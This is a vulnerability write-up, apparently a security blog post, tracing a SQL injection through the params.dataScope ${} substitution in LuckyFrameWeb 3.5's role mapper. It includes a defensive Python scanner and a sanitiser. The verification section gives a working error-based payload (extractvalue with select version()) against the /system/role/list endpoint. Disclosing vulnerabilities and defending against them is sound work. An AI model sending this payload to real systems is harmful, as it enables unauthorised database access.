LuckyFrameWeb 3.5 SQL injection (1)

src/main/resources/mybatis/system/RoleMapper.xml

This mapper uses ${} (raw string substitution into the SQL text) instead of #{} (a prepared-statement placeholder):

[screenshot]

Search for selectRoleList to see where this select id is used:

[screenshot]

src/main/java/com/luckyframe/project/system/role/controller/RoleController.java

The role list query in the controller:

[screenshot]

Follow the selectRoleList method into the service layer to see its implementation:

src/main/java/com/luckyframe/project/system/role/service/RoleServiceImpl.java

[screenshot]

The role object's params map is handed straight to the mapper, where params.dataScope is spliced into the SQL with ${}. Because dataScope is controllable by the caller (params[dataScope] in the request), the result is SQL injection.
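The two checks a defender wants from this finding are (1) a way to locate every ${} substitution in a mapper and tell which ones read from the request-bound params map, and (2) the mitigation: the data-scope clause must be set server-side from the logged-in user's role, and any dataScope the client sends must be discarded before the entity reaches the service. The following is an added example and is not code from LuckyFrame or RuoYi; the mapper XML, the function names and the query string are constructed for illustration, and it assumes the RuoYi-style convention that params[key] in a request is bound into the entity's params map.

```python
import re
from urllib.parse import parse_qsl
import xml.etree.ElementTree as ET

# Constructed sample mapper (not the project's real RoleMapper.xml). One
# statement splices params.dataScope with ${}, the other binds with #{}.
SAMPLE_MAPPER_XML = """<mapper namespace="com.example.RoleMapper">
  <select id="selectRoleList" resultMap="RoleResult">
    select r.role_id, r.role_name from sys_role r
    where r.del_flag = '0'
    <if test="roleName != null and roleName != ''">
      and r.role_name like concat('%', #{roleName}, '%')
    </if>
    ${params.dataScope}
  </select>
  <select id="selectRoleById" resultMap="RoleResult">
    select r.role_id, r.role_name from sys_role r where r.role_id = #{roleId}
  </select>
</mapper>
"""

SUBST_RE = re.compile(r"\$\{([^}]*)\}")          # ${...} string substitution
PARAMS_KEY_RE = re.compile(r"params\[([^\]]+)\]")  # params[key] request binding
DATA_SCOPE_KEY = "dataScope"


def find_string_substitutions(mapper_xml: str):
    """Return (statement id, expression, user_controllable) for every ${...}
    in a mapper. An expression is flagged user_controllable when it reads
    from the params map, which a RuoYi-style BaseEntity fills from request
    parameters unless the application clears it on the server side."""
    root = ET.fromstring(mapper_xml)
    findings = []
    for stmt in root:
        if stmt.tag not in ("select", "insert", "update", "delete"):
            continue
        # itertext() walks nested <if>/<where> nodes and their tails too
        sql_text = "".join(stmt.itertext())
        for match in SUBST_RE.finditer(sql_text):
            expr = match.group(1).strip()
            findings.append((stmt.get("id"), expr, expr.startswith("params.")))
    return findings


def bind_params(query: str) -> dict:
    """Mimic the binding of params[key]=value from a query string into the
    entity's params map (assumed convention, constructed for this example)."""
    bound = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        m = PARAMS_KEY_RE.fullmatch(key)
        if m:
            bound[m.group(1)] = value
    return bound


def sanitize_request_params(params: dict) -> dict:
    """Mitigation: drop any client-supplied dataScope before the entity reaches
    the service. The server-side data-scope filter then sets params.dataScope
    itself from the authenticated user's role, never from the request."""
    return {k: v for k, v in params.items() if k != DATA_SCOPE_KEY}


if __name__ == "__main__":
    for stmt_id, expr, controllable in find_string_substitutions(SAMPLE_MAPPER_XML):
        flag = "REQUEST-CONTROLLABLE" if controllable else "check origin"
        print(f"{stmt_id}: ${{{expr}}}  [{flag}]")
    # Constructed request: the dataScope value stands in for untrusted input.
    bound = bind_params("roleName=admin&params[dataScope]=<untrusted>&params[beginTime]=2020-01-01")
    print("bound from request:", bound)
    print("after sanitizing:  ", sanitize_request_params(bound))
```

The scanner treats any ${} as worth reviewing (ORDER BY columns and table names also need an allowlist when they come from ${}), and marks the params.* ones as the highest priority because that map is the path a request parameter takes into the SQL.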

[screenshot]


Verification:

Build the request URL and parameter name from the code:

http://127.0.0.1/system/role/list
params[dataScope]

Use error-based injection to read the database version:

params[dataScope]=and+extractvalue(1,concat(0x7e,substring((select+version()),1,32),0x7e))

[screenshot]

Query the database name:

[screenshot]



Disclaimer:
This article is for study and exchange only. Using it for illegal operations is strictly forbidden, and any consequences are borne by the reader. Reading this article means you agree to this statement.